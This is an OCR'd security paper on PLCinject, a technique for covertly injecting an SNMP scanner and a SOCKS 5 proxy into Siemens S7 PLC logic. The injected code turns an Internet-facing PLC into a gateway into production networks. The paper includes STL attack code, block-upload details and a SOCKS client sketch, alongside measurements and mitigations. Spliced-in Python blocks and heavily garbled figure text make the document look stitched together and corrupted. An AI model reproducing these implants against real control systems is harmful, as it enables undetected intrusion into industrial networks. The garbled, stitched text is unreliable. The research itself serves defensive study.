Our scanner and proxy can be deployed on a PLC without service interruption to the original PLC program, which makes it unlikely that unsuspecting operators will notice the infection. In order to demonstrate and analyze deep industrial network intrusion, we developed a proof of concept tool called PLCinject. Based on our proof of concept, we analyzed whether the augmentation of the original code with our PLC mal ware led to measurable effects that might help detecting such augmentations. We looked at timing effects, specifically. We found that augmented code is distinguishable from unaugmented code, that is, statistically significant timing differences exist. The difference is minor in absolute terms, that is, the augmentation does not likely affect a production process and hence it will not be noticable unless network operators actively monitor for malicious access. The downside is that operators of industrial networks must include PLCs in their vulnerability assessment procedures and they must actively monitor internal networks for malicious network traffic that originates from their own PLCs. Moreover, adversaries can leverage our approach to attack a company's business network from the industrial network. This means that network administrators must guard their business networks from the front and the back. The remainder of this paper is organized as follows. We begin with a discussion of work related to ours in II. In III, we give technical background for readers unfamiliar wth industrial control systems. We describe our attack and intrusion methods in IV. In VI, we discuss mitigations and VII concludes the paper. II. RE LA TED WORK Various attacks on PLCs have been published. Most attacks target the operating systems of PLCs. In contrast we leverage the abilities of logic programs running on the PLCs. As such we do not use any unintended functionality. In the following, we compare our approach to well-known (code) releases and published attacks that manipulate logic code. One of the most Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) MES SCADA PLC In-IOutputsignals Manufacturing process Figure 1: Automation pyramid, adopted from [15] cited SCADA attack descriptions is Beresfords' 2011 Black Hat USA release [5]. He demonstrated how credentials can be extracted from remote memory dumps. In addition he shows how to start and stop PLCs through replay attacks. In contrast to our work he does not alter the logic program on the PLC. In 2011 Langner released "A timebomb with fourteen bytes" [11] wherein he describes how to inject rogue logic code into PLCs. He borrows the same code prepending technology as we do, from Stuxnet. He conceptualizes how to take control away from the original code. In contrast, our program runs in parallel to the original code with the goal to not interfere with the original code's execution. An attack similar to Langners' was presented at Black Hat USA 2013 by Meixell and Forner [12]. In their release they describe different ways of exploiting PLCs. Among those are ways to remove safety checks from logic code. Again, our approach differs as we add new functionality while preserving original functionality . To our best knowledge, the first academic paper on PLC mal ware was published by McLaughlin in 2011 [13]. In this work he proposes a basic mechanism for dynamic payload generation. 
He presents an approach based on symbolic execution that recovers boolean logic from PLC logic code. From this, he tries to determine unsafe states for the PLC and generates code to trigger one of these states. In 2012 McLaughlin published a follow-up paper [14], which extends his approach in a way that automatically maps the code to a predefined model by means of model checking. With his model, he can specify a desired behaviour and automatically generate attack code. In his work McLaughlin focuses on manipulating the control flow of a PLC. We, in contrast, use the PLC as a gateway to the network and leave its original functions untouched.

III. INDUSTRIAL CONTROL SYSTEMS

Figure 1 illustrates the structure of a typical company that uses automation systems. Industrial control systems consist of several layers. At the top are enterprise resource planning (ERP) systems, which hold the data about currently available resources and production capacities. Manufacturing execution systems (MES) are able to manage multiple factories or plants and receive tasks from ERP systems. The systems below the MES are located in the factory. Supervisory control and data acquisition (SCADA) systems control production lines. They provide data about the current production state and they provide means for intervention. The devices holding the logic for production processes are called programmable logic controllers (PLC). We explain them in more detail in section III-A. Human machine interfaces (HMI) display the current progress and allow operators to interact with the production process.

A. PLC Hardware

A PLC consists of a central processing unit (CPU) which is attached to a number of digital and analog inputs and outputs. A PLC program stored in the integrated memory or on an external Multi Media Card (MMC) defines how the inputs and outputs are controlled. A special feature of a PLC is the guarantee of a defined execution time to control time-critical processes. For communication or special-purpose applications the functionality of a CPU can be extended with modules. The Siemens S7-314C-2 PN/DP we use in our experiments has 24 digital inputs, 16 digital outputs, 5 analog inputs, 2 analog outputs and an MMC slot. It is equipped with 192 KByte of internal memory; 64 KByte can be used for permanent storage. Additionally, the PLC has one RS485 and two RJ45 sockets [16].

[Figure 2: Overview of program execution, extracted from [17] - process image of outputs (PIO), process image of inputs (PII), user program executed in time slices of 1 ms each, cycle control point (CCP), operating system (OS)]

B. PLC Execution Environment

Siemens PLCs run a real-time operating system (OS), which initiates the cycle time monitoring. Afterwards the OS cycles through four steps (see figure 2). In the first step the CPU copies the values of the process image of outputs to the output modules. In the second step the CPU reads the status of the input modules and updates the process image of input values. In the third step the user program is executed in time slices with a duration of 1 ms. Each time slice is divided into three parts, which are executed sequentially: the operating system, the user program and the communication. The number of time slices depends on the current user program. By default the cycle time should not be longer than 150 ms. An engineer can configure a different value. If the defined time expires, an interrupt routine is called.
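This four-step loop, together with the watchdog limit, is the structure that the later attack and measurement discussions rely on. The following Python sketch is a host-side illustration of that scan-cycle structure only; it is not PLC code, and the 150 ms limit simply mirrors the default mentioned above.

```python
import time

CYCLE_LIMIT_S = 0.150  # default maximum cycle time mentioned above (150 ms)

def scan_cycle(read_inputs, user_program, write_outputs, outputs):
    """One PLC-style scan cycle: write outputs, read inputs, run the logic."""
    start = time.monotonic()
    write_outputs(outputs)          # step 1: process image of outputs -> modules
    inputs = read_inputs()          # step 2: modules -> process image of inputs
    outputs = user_program(inputs)  # step 3: user program computes new outputs
    elapsed = time.monotonic() - start
    if elapsed > CYCLE_LIMIT_S:     # step 4: simplified watchdog check
        raise RuntimeError(f"cycle time exceeded: {elapsed * 1000:.1f} ms")
    return outputs

# Toy logic mirroring the example program shown later in this section:
# Q0.0 = (I0.0 AND I0.1) OR I0.2
def logic(inputs):
    return {"Q0.0": (inputs["I0.0"] and inputs["I0.1"]) or inputs["I0.2"]}

outs = {"Q0.0": False}
outs = scan_cycle(lambda: {"I0.0": True, "I0.1": False, "I0.2": True},
                  logic, lambda o: None, outs)
print(outs)  # {'Q0.0': True}
```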
In the common case the CPU returns to the start of the cycle and restarts the cycle time monitoring [17].

C. Software

Siemens provides their Total Integrated Automation (TIA) portal software to engineers for the purpose of developing PLC programs. It consists of two main components: STEP7 as the development environment for PLCs and WinCC to configure HMIs. Engineers are able to program PLCs in Ladder Diagram (LAD), Function Block Diagram (FBD), Structured Control Language (SCL) and Statement List (STL). In contrast to the text-based SCL and the assembler-like STL, the LAD and FBD languages are graphical. PLC programs are divided into units of organization blocks (OB), functions (FC), function blocks (FB), data blocks (DB), system functions (SFC), system function blocks (SFB) and system data blocks (SDB). OBs, FCs and FBs contain the actual code, while DBs provide storage for data structures and SDBs hold current PLC configurations. For internal data storage addressing the prefix M for memory is used.

D. PLC Programs

A PLC program consists of at least one organization block called OB1, which is comparable to the main function in a traditional C program. It is called by the operating system. There exist more organization blocks for special purposes, for example OB100. This block is called once when the PLC starts and is usually used for the initialization of the system. Engineers can encapsulate code by using functions and function blocks. The only difference is an additional DB as a parameter when calling an FB. The SFCs and SFBs are built into the PLC; their code cannot be inspected. The STEP7 software knows which SFCs and SFBs are available based on hardware configuration steps.

The following examples give an overview of the programming languages SCL, LAD and STL. Each example shows the same configuration of three inputs and one output. First, the CPU performs a logical AND operation of inputs I0.0 and I0.1. Next, it calculates a logical OR operation of the outcome and the input I0.2. The result is written to output Q0.0, which sets the logical value on the connected wire in the next cycle. The first example represents the described program in STL. This is done in four lines of assembler-like instructions; each line defines one instruction.

  A %I0.0
  A %I0.1
  O %I0.2
  = %Q0.0

The next example shows the same program in the text-based language SCL. This program can be expressed in one line.

  %Q0.0 := (%I0.0 AND %I0.1) OR %I0.2;

The graphical example needs the help of STEP7. Inputs and outputs are positioned through drag & drop on the wire. New connections can be made at predefined positions by selecting the wire tool from the toolbar. Figure 3 shows the graphical representation of our example program.

[Figure 3: Function block diagram example]

The following description can also be found in the Siemens manual delivered with the PLC [18]. The CPU has several registers used for execution and current state. For binary operations the status word register is important; all binary operations influence this register. For calculations the CPU uses up to four accumulator registers of 32 bits width. They are organized like a stack. It is possible to address each byte of the top register independently.
Before a new value is loaded into accumulator one, the current value is copied to accumulator two. For adding two numbers, the values have to be loaded successively into the accumulator registers before the +D operation is called. The result is written back into accumulator one. In STL the program looks as follows.

  L  DW#16#1    // ACCU1 = 1
  L  DW#16#2    // ACCU1 = 2, ACCU2 = 1
  +D            // ACCU1 = ACCU1 + ACCU2

Code which is used multiple times in the program should be implemented as functions. These functions can be called from every point in the code. The CALL instruction allows jumping into the defined function. The necessary parameters are defined in the called function's header and have to be specified below every CALL instruction.

  CALL FC1
    VAR1 := 1
    VAR2 := W#16#A

As mentioned earlier, the only difference between function blocks and functions is a reference to the corresponding data block. In many cases the program needs storage which is assigned to a specific function to read constants or save process values. It is unusual to put constants directly in the code, because the code would have to be recompiled after every change. In contrast, data blocks can be manipulated easily, even remotely. A function block call looks as follows.

  CALL FB1, %DB1
    VAR1 := 1
    VAR2 := W#16#A

Both function types can define different parameters: IN, OUT, IN_OUT, TEMP and RET_VAL. An FB additionally has STAT parameters, which are stored in its data block; the data block is passed as an additional argument. The TEMP type declares local variables which are only available in the function. The other types are self-explanatory.

E. Binary Representation of PLC Program

Every program, written in any of these languages, is compiled into MC7. The opcode length of MC7 instructions is variable and the encoding of parameters differs between many instructions. The binary representation of the example program from the section before looks as follows (MC7 encoding next to each instruction):

  00100000   A %I0.0
  00110000   A %I0.1
  01120000   O %I0.2
  41100000   = %Q0.0

F. Network Protocol

Siemens PLCs use the proprietary S7Comm protocol for transferring blocks. It is a remote procedure call (RPC) protocol based on TCP/IP and ISO over TCP. Figure 4 illustrates the encapsulation of the protocols. The protocol provides the following functionality:
  - System State List (SSL) request
  - List available blocks
  - Read/write data
  - Block info request
  - Up-/download block
  - Transfer block into filesystem
  - Start, stop and memory reset
  - Debugging

Executing one of these functions requires an initialized connection. After a regular TCP handshake, the ISO over TCP setup is performed to negotiate the PDU size. In the S7Comm protocol the client has to provide, in addition to its preferred PDU size, the rack and slot of the CPU (see connection setup in figure 5). The CPU responds with its preferred PDU size and both agree to continue with the minimum of the two values. After this initialization the client is able to invoke the functions on the CPU. Figure 5 shows the packet order of a download block function including the transfer into the filesystem. The PLC controls the download process after receiving the download request. The number of download block requests depends on the length of the block and the PDU size. The end is signaled with the download end request.
The PLC waits after receiving the acknowledgement for further requests. Finally the transferred block should be persisted by calling the PLC control request. With the destination filesystem P as parameter, the CPU stores the block and executes it. The upload process is similar. The engineering workstation (EWS) requests the upload of a specific block and waits for the acknowledgement. After receiving the acknowledgement without errors, the EWS starts requesting the block. The responses contain the data of the block. The EWS repeats the procedure until the whole block is transferred. The end is signaled with an upload end request.

The transferred blocks are structured and consist of a header, a data part and a footer. Table I shows the structure of the known bytes. The footer contains information about the parameters used for calling the function. Not every byte of the header and footer is well known, but we have identified the areas necessary to understand the content.

Table I: Block structure, adopted from code [20]
  Description                         Bytes   Offset
  Block signature                     2       0
  Block version                       1       2
  Block attribute                     1       3
  Block language                      1       4
  Block type                          1       5
  Block number                        2       6
  Block length                        4       8
  Block password                      4       12
  Block last modified date            6       16
  Block interface last modified date  6       22
  Block interface length              2       28
  Block segment table length          2       30
  Block local data length             2       32
  Block data length                   2       34
  Data (MC7 / DB)                     x       36
  Block signature                     1       36+x
  Block number                        2       37+x
  Block interface length              2       39+x
  Block interface blocks count        2       41+x
  Block interface                     y       43+x

IV. ATTACK DESCRIPTION

The search engine SHODAN shows that thousands of industrial control systems are directly accessible via the Internet [8], [10]. As shown in chapter III it is possible to download and upload the PLC program code. This enables attackers to manipulate the logic code of the PLCs that reads inputs and outputs. Furthermore, the PLC offers a system library [21] which contains functions to establish arbitrary TCP/UDP communication. An attacker can use the full TCP/UDP support to scan the local production network behind the Internet-facing PLC. Furthermore, he can leverage this PLC as a gateway to reach all the other production or network devices.

Like Stuxnet, we prepend the attacker's code to the existing logic code of the PLC. The malicious code will be executed at the very beginning of OB1 in addition to the normal control code. That is why the PLC will not be disturbed in its function. The easiest way is to download the OB1 of Siemens PLCs and add a CALL instruction to an arbitrary function under our control, in our example a function called FC666. Then the patched OB1, FC666 and additional blocks will be uploaded to the PLC. Figure 7 illustrates the code injection process. With the next execution cycle of the PLC, the newly uploaded program including the attacker's code will be executed without any kind of service disruption. This process enables the attacker to run any additional malicious code on the PLC. With this paper we publish a tool called PLCinject that automates this process [22]. Having these capabilities, an attacker is able to execute the attack cycle shown in figure 6. In step one the attacker injects an SNMP scanner that runs in addition to the normal control code of the PLC. After a full SNMP scan of the local network (step two), the attacker can download the scan results from the PLC (step three).
The attacker now has an overview of the network behind the Internet-facing PLC. The attacker removes the SNMP scanner and injects a SOCKS proxy into the PLC logic program (step four). This enables the attacker to reach all PLCs in the local production network via the compromised PLC, which acts as a SOCKS proxy. In the next two sections we explain the implementation of the SNMP scanner and the SOCKS proxy. We will not explain every operation and system function in detail; for a complete description of those we refer to [18] and [21].

[Figure 4: Packet encapsulation, adopted from [19] - an S7 telegram (header, parameters, parameter data, data) forms the S7 PDU, which is carried over ISO over TCP (TPKT, COTP) on top of TCP/IP]

[Figure 5: Download block sequence diagram - connection setup with PDU size negotiation (EWS proposes 512, PLC answers 240), download request/ack, repeated download block/ack exchanges carrying the data, download end/ack, and finally a PLC control request ("insert block into filesystem P") with its ack]

A. SNMP Scanner

Siemens PLCs cannot be used as a TCP port scanner because the TCP connection function TCON cannot be aborted until the function has established a connection. Furthermore, it is only possible to run eight TCP connections in parallel on a Siemens S7-300 PLC. Consequently, the PLC is only able to perform a TCP scan until eight unsuccessful connection attempts have occurred. This limitation does not apply to stateless UDP connections. That is why we use the UDP-based Simple Network Management Protocol (SNMP). SNMP version 1 is defined in RFC 1157 [23] and was developed for monitoring and controlling network devices. A lot of network devices and most of the Siemens SIMATIC PLCs have SNMP enabled by default. Siemens PLCs are very communicative in case of enabled SNMP. By reading the SNMP sysDescr object (OID 1.3.6.1.2.1.1.1), the Siemens PLC will transmit its product type, product model number, hardware and firmware version, as shown in the following SNMP response: Siemens, SIMATIC S7, CPU314C-2 PN/DP, 6ES7 314-6EH04-0AB0, HW: 4, FW: V3.3.10. The system description is very useful for matching discovered PLCs against vulnerability and exploit databases. The firmware of PLCs is not patched very often. There are mainly two reasons: on the one hand, a PLC firmware patch will interrupt the production process, which causes a negative monetary impact. On the other hand, a firmware patch of the PLC can lead to a loss of the production certification or other kind of quality assurance that is important for the customers of the manufacturing company. That is why the probability of finding a Siemens PLC with a known vulnerability is very high.

The SNMP scanner can be broken down into the following steps:
1) Get local IP and subnet
2) Calculate IPs of the subnet
3) Set up UDP connection
4) Send SNMP request
5) Receive SNMP responses
6) Save responses in a DB
7) Stop scanning and disconnect UDP connection

As described in chapter III, the programming of a PLC is quite different from normal programming with, e.g., the C language on an x86 system. Each PLC program is cyclically executed, so the state of the program has to be saved after each step using condition variables. For reasons of comprehensibility we will only explain steps one to three.
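Steps one and two amount to simple address arithmetic: AND the local IP with the subnet mask to get the network base address, and invert the mask to get the number of host addresses to probe. The STL figures discussed in the following paragraphs implement this on the PLC; the Python sketch below shows the same arithmetic on a host, purely as an illustration (the IP and mask values are made up).

```python
import ipaddress

# Illustrative values; on the PLC these come from the System State List (SSL).
local_ip = "10.0.0.3"
subnet_mask = "255.255.255.0"

ip = int(ipaddress.IPv4Address(local_ip))
mask = int(ipaddress.IPv4Address(subnet_mask))

network_base = ip & mask        # step 1/2: first address of the subnet
num_hosts = mask ^ 0xFFFFFFFF   # size of the host range (inverted mask)

targets = [str(ipaddress.IPv4Address(network_base + i)) for i in range(1, num_hosts)]
print(f"scanning {len(targets)} addresses, from {targets[0]} to {targets[-1]}")
# Each target would then receive an SNMP GET for sysDescr (OID 1.3.6.1.2.1.1.1.0)
# over UDP port 161 -- steps 3 to 5 of the scanner.
```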
Figure 8 shows a code snippet of step one that calls the ROSYSST function. The ROSYSST function reads the internal System State List (SSL) of the Siemens PLC to obtain the PLC's local IP. SSL requests are normally used for diagnostic purposes. Line 14 and 15 will end the function in the case that the ROSYST function is busy. Figure 9 shows how the program calculates the first local IP. This is done by bitwise logic AND operation of the PLC's local IP address with its subnet mask, which returns the start address of the local network address range (line 24 -30). Now the SNMP scanner needs to know how often it must increment the IP address to cover the whole local subnet. Therefore we XOR the subnet mask with OxFFFFFFFF (line 35 -39). The result is the number of IP addresses in the subnet. Figure 10 shows how to set up an UDP connection in STL. At first we need to call the TCON function with special parameters in our TCON_P AR_SCAN data block. In case of UDP the TCON function does not set up a connection, this will only be done in the case of TCP because it is connection oriented in contrast to UDP. But calling the Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) 1O.0.0.3 .. -, ,- ".l \ ___ , , " ,\ )1 I Corporate I production "l " network , r", ', J _ ... 1O.0.0.3 (a) Attacker abuses the PLC to scan the local network for SNMP (b) Now he can use the PLC as a gateway into the local network devices Figure 6: Attack cycle OB 1 L1: II A AN A JNB CALL NOP ... 90Q124.0 90M72.1 90Q124.2 9OL20.0 L1 / FBI, 900B8 0 II (a) Original program. OB 1 / II CALL reset A AN A JNB CALL L1: NOP 0 I I ". FC666 registers 9OQ124.0 90M72 .1 9OQ124.2 90L20.0 /I Ll FBI, 900B8 I A A OPN A A A FB 1 9OI124.7 9OI124.6 Fe 666 OB666 900BX0.4 FB 1 90I124.7 90I124.6 (b) Patched program. The red blocks are added by PLCinject. Figure 7: Scheme of patching the PLCs program. ICON parameter once is not enough. The connection function will start to work when the #connect variable raises from o to 1 between two calls of the function. That is why we programmed a toggle function after the first appearance of the connect function (line 10 -11). This will change the 529 0001 get_ip : NOP 1 0002 0003 II read ip from system state list (SZL) 0004 CALL RDSYSST 0005 REQ SZL ID INDEX :=TRUE :=W#16#0037 :=W#16#0000 0006 0007 0008 0009 0010 0011 RET VA L :=#sysst_ret 0012 BUSY :=#syss t_busy SZL HEADER :="DB".szlheader.SZL HEADER DR :="DB".ip_info 0013 II wait until SZL read finish ed 0014 A #sysst_busy 0015 BEC 0016 0017 0018 SET S Figure 8: Get PLCs local IP #connect value from false to true after ICON has been called the first time in a cycle. The ICON function will detect a raising signal edge on its call in the next cycle and will then be executed. The next step is to send the UDP based SNMP packets and receive them. This will be done by calling the functions IUSEND and IURCV. After the SNMP scan has been completed all data will be stored in data block which can be downloaded by the attacker (step 3). B. SOCKS 5 Proxy Once the attacker has discovered all SNMP devices, in cluding the local PLCs, the next step is to connect to them. This can be accomplished by using the accessible PLC as a gateway into the local network. To achieve this we chose to implement a SOCKS 5 proxy on the PLC. This has two main reasons. 
At first the SOCKS protocol is quite lightweight and easy to implement. Furthermore all applications can use this Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) 0020 II calc first ip of local network 0021 II L "DB".ip_info .local ip 0022 OPN "DB" 0023 L %DBD406 002 4 II L "DB".ip_info .subnet 0025 L %DBD410 0026 AD 0027 II T "DB".ADDRESS .rem ip addr 002 8 T %DBD64 002 9 0030 I I 0031 I I 0032 0033 get number of hosts from subnet L "DB" .ip_info .subnet L %DBD4 10 L DW#16#FFFFFFFF 0034 XOD 0035 T #num hosts Figure 9: Calculate the local nets first IP and the maximal number of hosts 0001 0002 0003 0004 0005 0006 0007 0008 0009 0010 0011 CALL TCON , "T CON DB SCAN" AN - - REQ :=#connec t ID :=1 DONE :=#con done - BUSY :=#con _busy ERROR :=#con error - STATUS :=#con status - CONNECT :="DB".TCON #connected #connect PAR -SCAN Figure 10: Setup a UDP connection kind of proxy, either they are SOCKS aware and thus can be configured to use one or you use a so-called proxifier to add SOCKS support to arbitrary programs. The SOCKS 5 protocol is defined in RFC 1928 [24]. An error-free TCP connection to a target through the proxy consists of the following steps: 1) The client connects via TCP to the SOCK S server and sends a list of supported authentication methods. 2) The server replies with one selected authentication method. 3) Depending on the selected authentication method the appropriate sub-negotiation is entered. 4) The client sends a connect request with the targets IP. 5) The server sets up the connection and replies. All subsequent packets are tunneled between client and target. 6) The client closes the TCP connection. Our implementation offers the minimal necessary function ality. It supports no authentication, so we can skip step 3. Also we do not support proper error handling. In the end only TCP connects with IPv4 addresses are supported. Once the client connected, we expect this message flow: 1) Client offers authentication methods: any mes sage, typically Ox05 <authcount-n> (1 byte) <authlist> (n bytes). 2) Server chooses authentication method: 0 x 0 5 0 x 00 (perform no authentication). 530 0002 0003 0004 0005 0006 0007 0008 0009 0010 0011 0005 0006 0007 0008 0009 0010 0011 0012 0013 0014 0015 0016 0017 0018 0019 JL lend JU bind II state JU ne goti ate II state JU authenticate II state JU connect_request II state JU connect II state JU connect confirm II state JU proxy II state JU reset II state lend: JU end Figure 11: Jump list for the states of SOCKS 5 CALL TRCV , "T RCV_cl ient_DB" A AN AN JC EN R :=TRUE ID :=W#16#000 1 LEN :=0 NDR :=#rcv ndr BUSY :=#rcv_busy ERROR :=#rcv error STATUS RCVD LEN - DAT A :="buffe rs" .rev #rcv ndr - #rcv_busy #rcv error - next state -0 1 2 3 4 5 6 7 Figure 12: Receive the clients authentication negotiation 3) Client wants to connect to target: OxO 5 OxO 1 OxO 0 OxOl <ip> (4bytes) <port> (2 bytes). 4) Server confirms connection: OxO 5 OxO 0 OxO 0 OxOl OxOO OxOO OxOO OxOO OxOO OxOO. 5) Client and target can now conununicate through the connection with the server. As previously mentioned, programs on the PLC are cyclically executed. This is why we use a simple state machine to handle the SOCKS protocol. Therefore we number each state and use a jump list to execute the corresponding code block, see figure 11. 
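From the attacker's side, talking to this proxy is ordinary RFC 1928 traffic. The sketch below is a minimal Python SOCKS 5 client performing exactly the no-authentication message flow listed above (greeting, method selection, CONNECT, then raw tunnelling); the addresses are placeholders and error handling is omitted, mirroring the minimal server described here.

```python
import socket
import struct

def socks5_connect(proxy_host, proxy_port, target_ip, target_port):
    """Open a TCP connection to target via a SOCKS 5 proxy (no authentication)."""
    s = socket.create_connection((proxy_host, proxy_port))
    # Greeting: version 5, one auth method offered, 0x00 = no authentication.
    s.sendall(b"\x05\x01\x00")
    ver, method = s.recv(2)
    assert ver == 0x05 and method == 0x00, "proxy refused no-auth"
    # CONNECT request: version 5, cmd 1, reserved, atyp 1 (IPv4), ip, port.
    req = b"\x05\x01\x00\x01" + socket.inet_aton(target_ip) + struct.pack(">H", target_port)
    s.sendall(req)
    reply = s.recv(10)
    assert reply[1] == 0x00, f"connect failed, reply code {reply[1]}"
    return s  # from here on, bytes are tunnelled to and from the target

# Example (placeholder addresses): reach an internal PLC through the
# Internet-facing PLC that runs the SOCKS proxy on port 1080.
# conn = socks5_connect("203.0.113.10", 1080, "10.0.0.5", 102)
# conn.sendall(b"...")   # e.g., ISO-on-TCP traffic to the internal device
```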
A state transition is achieved by incrementing the state number which is persisted in a data block. It follows a description of each state and its actions: bind -On first start the program has to bind and listen to SOCKS port 1080. This is accomplished by using the system function TCON in passive mode. We stay in this state until a partner is connecting to this port. negot i ate -We wait until the client sends any message. This is done with the function TRCV which is enabled with the EN_R argument, see figure 12. aut hent icat e -After the first message we send a reply which indicates the client to perform no authentication. For this purpose we use the TSEND system function. In contrast to TRCV this function is edge controlled which means the parameter REQ has to change from FALSE to TRUE between consecutive calls to activate sending. As shown in figure 13 we toggle a flag and call TSEND twice with a rising edge on REQ. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) 0008 CALL TSEND , "TSEND client DB" - 0009 REQ :=#authent icate 0010 ID :=W#16#000 1 0011 LEN :=2 0012 DONE :=#sn d done 0013 BUSY :=#sn d_busy 0014 ERROR :=#sn d error 0015 STATUS .= 0016 DAT A :="buffe rs".snd 0017 0018 AN #authen ticate 0019 S #authen ticate 0020 JC authenticate 002 1 0022 A #snd done 002 3 AN #snd erro r 002 4 AN #snd_busy 002 5 JC next state - Figure 13: Respond with no authentication necessary connect_request -Then we expect the client to send a connection set up message containing target IP and port number which is stored for the next state. connect -We set up the connection to the target with TCON. connect_confirm -When the connection to the target is established, we send the confirmation message to the client. proxy -Now we simply tunnel the connections between client and target. All data received from the client with TRCV is stored in a buffer which is reused to feed the TSENO function for sending data to the client. The same principle applies to the opposite direction, but we have to consider that sending messages can take a couple of cycles. Therefore a second buffer is used to ensure that no messages are mixed or lost. A disconnect is signaled with the error flag of TRCV. When this occurs we will send the last received data and then we go to the next state. reset -In this state we close all connections with TO I SCON and reset all persisted flags to its initial values. V. EVA LUATION We analyzed the differences of the execution cycle times of the following scenarios: (a) a simple control program as a baseline, (b) its malicious version with the prepended SOCKS proxy in idle mode and (c) under load. Idle mode means that the proxy has been added to the control code but no proxy connection has been established. The Baseline program copies bytewise the input memory to the output memory 20 times which results in 81920 copy instructions. For the measurement, we added small code snippets which store the last cycle time in a data block. Siemens PLCs store the time of last execution cycle in a local variable of OBI called OBl_PREV_CYCLE. We measured 2046 cycles in each scenario. All three scenarios do not exhibit normal distributions. We used the Kruskal-Wallis and the Dunn's Multiple Comparison Test for statistical significance analysis. The results are shown in Figure 14. Execution time differed significantly in all three scenarios. 
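The same comparison can be reproduced offline from logged cycle times. The following Python sketch applies the Kruskal-Wallis test to three recorded samples; the arrays here are synthetic stand-ins for the 2046 measured cycles per scenario, and SciPy's kruskal (plus a Mann-Whitney U follow-up) is used in place of the Prism and Dunn's test workflow used by the authors.

```python
import numpy as np
from scipy.stats import kruskal, mannwhitneyu

rng = np.random.default_rng(0)
# Synthetic stand-ins for the logged OB1_PREV_CYCLE values (ms), 2046 per scenario.
baseline   = rng.normal(85.32, 0.49, 2046)
proxy_idle = rng.normal(85.40, 0.50, 2046)
proxy_load = rng.normal(86.67, 0.52, 2046)

h, p = kruskal(baseline, proxy_idle, proxy_load)
print(f"Kruskal-Wallis: H = {h:.1f}, p = {p:.3g}")

# Pairwise follow-up (Mann-Whitney U here, instead of Dunn's test used in the paper).
for name, sample in [("proxy idle", proxy_idle), ("proxy under load", proxy_load)]:
    u, p_pair = mannwhitneyu(baseline, sample)
    print(f"baseline vs {name}: p = {p_pair:.3g}")
```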
[Figure 14: Data distribution of the measured scan cycle times for the three scenarios, shown as box plots with mean. Data were analyzed with the Kruskal-Wallis test and Dunn's Multiple Comparison Test; significant differences are marked in the graph (p < 0.0001 = ***). All data were statistically analyzed with Prism software, version 5.0 (GraphPad Inc.).]

Table II: Statistical analysis of the three scenarios
                          Mean    Std. Deviation  Std. Error
  Baseline (ms)           85.32   0.4927          0.01089
  Proxy idle (ms)         85.40   0.5003          0.01106
  Proxy under load (ms)   86.67   0.5239          0.01158

Table II shows the mean difference between the Baseline and the Proxy under load program, which is only 1.35 ms. The maximum transfer rate of the SOCKS proxy prepended to the Baseline program was about 40 KB/s. If the SOCKS proxy runs alone on the PLC, it is able to transfer up to 730 KB/s. All network measurements used a direct 100 Mbit/s Ethernet connection to the PLC. Finally, we tested the described attack cycle in our laboratory. In addition to regular traffic, we verified that we were able to tunnel an exploit for the DoS vulnerability CVE-2015-2177 via the SOCKS tunnel using the tsocks library. The exploit worked as expected via the SOCKS tunnel.

VI. DISCUSSION

Our attacks have limitations. In order to ensure that the PLC is always responsive, the execution time of the main program is monitored by a watchdog which kills the main program if the execution time becomes too long. The additional SNMP scanner or proxy code that we upload, together with the original program, should not exceed the overall maximum execution time of 150 ms. An injection of the scanner or proxy is unlikely to trigger this timeout because the mean additional execution time of the proxy under load is 1.35 ms, which is small compared to 150 ms. Furthermore, time-outs can be avoided by resetting the time counter after the execution of the injected program with the system function RE_TRIGR [21]. The easiest way to mitigate the described attack is to keep the PLC offline or to use a virtual private network instead. If this is not possible, protection level 3 should be activated on the Siemens PLC. This enables a password-based read and write protection for the PLC. Without the right password the attacker cannot modify the PLC's program. Based on our experience, this feature is rarely used in practice. Another applicable protection mechanism would be a firewall with deep packet inspection which is aware of industrial control protocols and can thus block potentially malicious accesses such as attempts to reprogram the PLC.

VII. CONCLUSION

We have shown a new threat vector that enables an external attacker to leverage a PLC as an SNMP scanner and network gateway to the internal production network. This makes it possible to access control systems behind an Internet-facing PLC. Our measurements indicate that the attack code, which runs de facto in parallel to the original control program, causes a statistically significant but negligible increase of the execution cycle time. This makes a service disruption of the PLC unlikely and increases the chances that an attack remains undetected.
Prior work on scanning the Internet for ICS only adressed risks due to control systems that are connected to the Internet directly . Our investigation shows that risks assessments must take PLCs into account that are connected only indirectly to the Internet. As a consequence, the target set of Internet-reachable industrial control systems is probably larger than expected and includes the "deep" industrial control network. RE FERENCES [I] S. Heng, "Industry 4.0 upgrading of germany's industrial capabilities on the horizon:' Deutsche Bank Research, 2014. [2] NIST , "CVE-2014-2908," Apr. 2014. [Online]. Available: hups: Ilweb.n vd.nist.gov/view/vuln/detail?vulnld=CVE-2014-2908 [3] --, "CVE-2014-2246," Mar. 2014. [Online]. Available: https: Ilweb.n vd.nist.gov/view/vuln/detail?vulnld=CVE-2014-2246 [4] --, "CVE-2012-3037," May 20l2. [Online]. Available: hups: Ilweb.n vd.nist.gov/view/vuln/detail?vulnld=CVE-2012-3037 [5] D. Beresford, "Exploiting Siemens Simatic S7 PLCs," Black Hat USA, 2011. [6] N. Cybersecurity and C. I. C. (NCC IC), "Ics-cert monitor," Sep. 2014. [7] Bundesamt fUr Sicherheit in der Informationstechnik, "Die Lage der IT-Sicherheit in Deutschland 2014," 2015. [8] Industrial Control Systems Cyber Emergency Response Team, "Alert (ICS-ALERT -l2-046-0 LA) Increasing Threat to Industrial Control Systems (Update A)," Available from ICS-CERT, ICS ALE RT-12-046-0lA., Oct. 20l2. [Online]. Available: hups: I lics- cert.us- cert.gov lalerts/ICS- ALERT- 12-046- 0 I A [9] J.-O. Malchow and J. Klick, Sicherheit in vernetzten Systemen: 21. DFN- Workshop. Paulsen, c., 2014, ch. Erreichbarkeit von digitalen Steuergeraten -ein Lagebild, pp. C2-CI9. [IO] B. Radvanovsky, "Project shine: 1,000,000 internet-connected scada and ics systems and counting," Tofino Security, 2013. [11] R. Langner. (2011) A time bomb with fourteen bytes. [Online]. Available: 